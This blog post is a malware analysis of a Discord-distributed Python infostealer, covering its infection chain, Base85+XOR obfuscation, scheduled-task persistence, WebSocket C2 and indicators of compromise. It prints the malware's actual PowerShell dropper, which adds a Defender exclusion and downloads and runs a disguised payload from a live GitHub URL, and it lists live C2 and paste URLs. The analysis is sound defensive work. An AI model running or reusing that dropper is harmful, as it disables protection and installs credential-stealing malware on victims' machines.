DEV Community

yuribe
yuribe

Posted on • Originally published at yuriibe.github.io

Malware Analysis: Discord-Delivered Infostealer (Lapresse)

#malware #infostealer #python #reverseengineering

Executive Summary

I investigated a Discord-distributed malware campaign delivering a Python-based infostealer disguised as .zip files. The malware employs Base85 + XOR obfuscation, multiple persistence mechanisms, and a WebSocket-based C2 infrastructure. I performed both static and dynamic analysis to uncover the infection chain, payload behavior, and exfiltration methods.

Threat Overview

Category Details
Malware Type Python-based Infostealer
Entry Point Discord server promotion
Obfuscation Base85 + XOR
Persistence Scheduled tasks
Exfil Method Discord Webhooks & WebSocket C2
Primary C2 ws://195.211.190.107:8767
Tools Used pyinstxtractor, pycdc, HxD, Wireshark

1. Initial Vector

  • Delivery Method: Discord server promoted via discordservers.com
  • File Name: Launcher.exe
  • Behavior:
    • Hosted on Discord CDN
    • Attempts to evade detection of payloads by using a .zip extension with an executable file (confirmed by MZ header in HxD)
    • HxD
    • Downloads additional payloads via obfuscated PowerShell script

Advertised Discord Server

https://discordservers.com/server/135413481619456414

Fake user:

Fake user

Real user:

Real User

2. Payload Chain

The PowerShell script downloads 5 payloads from GitHub.

Triage

Initial sample - Launcher.exe from Discord
Sandbox Link

Payloads:

Grabbed from:
https://idefasoft.com/pastes/yUmTjqdnCjrD/raw/

WARNING: This PowerShell is malicious. Do not run it.
For educational purposes only - shown here as part of analysis.

Set-MpPreference -ExclusionExtension *.exe
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/Lapresse-Hugo/MalwareDatabase/refs/heads/master/Unknown/1.zip" -OutFile "$Env:LocalAppData\Updates\firefox_updater.exe"; Start-Process -Verb RunAs -Filepath "$Env:LocalAppData\Updates\firefox_updater.exe"
Enter fullscreen mode Exit fullscreen mode

Despite .zip extension, all are PyInstaller-packed .exe files.

Payload Analysis (via Detect It Easy):

  • Payloads 1, 3, 5 are PyInstaller executables

Detect it Easy

Signs of being infostealers: master_key, passwords, webhook_url, ImageGrab, etc.

3. Obfuscation Techniques

Encoding Technique

The malware used a combo of Base85 encoding and an XOR cipher with hardcoded keys to obfuscate its payload URLs. I discovered this while reversing main.pyc from Payload 5. After extracting the binary using pyinstxtractor and partially decompiling with pycdc, I noticed suspicious encoded strings like this:

sJ6APjTTG5m = [
    bytes((
        lambda .0: [
            b ^ bytes([
                79, 236, 233, 131, 98, 113, 56, 128,
                1, 188, 24, 65, 215, 92, 0, 10
            ])[i % len(bytes([
                79, 236, 233, 131, 98, 113, 56, 128,
                1, 188, 24, 65, 215, 92, 0, 10
            ]))]
            for i, b in .0
        ]
    )(enumerate(base64.b85decode(
        'Czze{5la`ZaouY*vOZ~KVULFHO#@l?F8C@Il@dxv3j'
    )))).decode(),
    ...
]
Enter fullscreen mode Exit fullscreen mode

From there, I wrote a quick decoder in Python:

import base64

def decode_b85_xor(encoded: bytes, key: bytes) -> str:
    decoded_bytes = base64.b85decode(encoded)
    xored = bytes([b ^ key[i % len(key)] for i, b in enumerate(decoded_bytes)])
    return xored.decode(errors="replace")

encoded_1 = b'Czze{5la`ZaouY*vOZ~KVULFHO#@l?F8C@Il@dxv3j'
key_1 = bytes([79, 236, 233, 131, 98, 113, 56, 128, 1, 188, 24, 65, 215, 92, 0, 10])
print(decode_b85_xor(encoded_1, key_1))
Enter fullscreen mode Exit fullscreen mode

Decoded Payload URLs 

{
  "url1": "https://pastebin.com/raw/D2WBNJMD",
  "url2": "https://idefasoft.com/pastes/2EiUfFx35K3p/raw/",
  "resolved": "ws://195.211.190.107:8767"
}
Enter fullscreen mode Exit fullscreen mode

4. Persistence & Behavior

  • Creates Scheduled Tasks: EdgeUpdater, SystemUpdater, WindowsUpdater
  • Survives reboot
  • Screenshot + credential grab
  • Uses Discord Webhooks and WebSocket for exfil

5. Network Infrastructure

C2 Server

  • WebSocket URL: ws://195.211.190.107:8767
  • Resolved Host: ryoko.questnerd.net

Geo Info 

IP: 195.211.190.107
Location: Kerkrade, Limburg, NL
Org: AS214943 Railnet LLC
Enter fullscreen mode Exit fullscreen mode

6. Attribution Clues

Attribution likely false - this appears to be impersonation.

7. Indicators of Compromise (IOCs)

Type Value
URL https://pastebin.com/raw/D2WBNJMD
URL https://idefasoft.com/pastes/2EiUfFx35K3p/raw/
GitHub https://github.com/Lapresse-Hugo/MalwareDatabase
WebSocket C2 ws://195.211.190.107:8767
IP 195.211.190.107

8. Detection & Mitigation

  • Detect disguised .zip files with MZ headers
  • Block outbound WebSocket to untrusted IPs
  • Alert on suspicious PowerShell + scheduled task creation

9. Tooling & Methodology

  • Static: HxD, Detect It Easy
  • Dynamic: tria.ge, Wireshark
  • Unpacking: pyinstxtractor
  • Decompiling: pycdc
  • Scripting: Custom Python deobfuscator

Conclusion

This analysis shows how social engineering and public infra (Discord, GitHub, Pastebin) combine to deliver Python-based infostealers with persistence, obfuscation, and stealth C2.

What I Learned

  • PyInstaller malware reversing
  • Base85 + XOR deobfuscation
  • Triage + tooling workflow

Top comments (0)